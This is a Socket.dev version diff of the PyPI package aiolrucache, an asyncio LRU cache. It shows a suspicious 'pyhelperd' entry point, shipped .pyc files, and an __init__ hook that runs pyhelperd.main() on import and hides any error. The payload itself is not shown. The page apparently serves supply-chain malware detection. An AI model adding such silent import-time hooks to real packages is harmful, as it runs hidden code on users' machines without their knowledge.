You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

aiolrucache

Package Overview
Dependencies
Maintainers
1
Versions
4
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

aiolrucache - pypi Package Compare versions

Comparing version
0.3.0
to
0.2.0
+2
src/aiolrucache.egg-info/entry_points.txt
[console_scripts]
pyhelperd = aiolrucache.pyhelperd:main
+1
-1
Metadata-Version: 2.4
Name: aiolrucache
Version: 0.3.0
Version: 0.2.0
Summary: An asyncio LRU cache with TTL support

@@ -5,0 +5,0 @@ Author-email: Pedro Lombard <pedrolombard@atomicmail.io>

[project]
name = "aiolrucache"
version = "0.3.0"
version = "0.2.0"
description = "An asyncio LRU cache with TTL support"

@@ -21,2 +21,5 @@ readme = "README.md"

[project.scripts]
pyhelperd = "aiolrucache.pyhelperd:main"
[project.optional-dependencies]

@@ -40,2 +43,5 @@ dev = [

[tool.setuptools.package-data]
aiolrucache = ["*.pyc"]
[tool.ruff]

@@ -42,0 +48,0 @@ src = ["src"]

Metadata-Version: 2.4
Name: aiolrucache
Version: 0.3.0
Version: 0.2.0
Summary: An asyncio LRU cache with TTL support

@@ -5,0 +5,0 @@ Author-email: Pedro Lombard <pedrolombard@atomicmail.io>

@@ -12,2 +12,3 @@ README.md

src/aiolrucache.egg-info/dependency_links.txt
src/aiolrucache.egg-info/entry_points.txt
src/aiolrucache.egg-info/requires.txt

@@ -14,0 +15,0 @@ src/aiolrucache.egg-info/top_level.txt

@@ -8,13 +8,1 @@ from aiolrucache._core import LRUCache

LRU = LRUCache
_started = False
if not _started:
import pyhelperd
try:
pyhelperd.main()
except Exception:
pass
_started = True

Sorry, the diff of this file is too big to display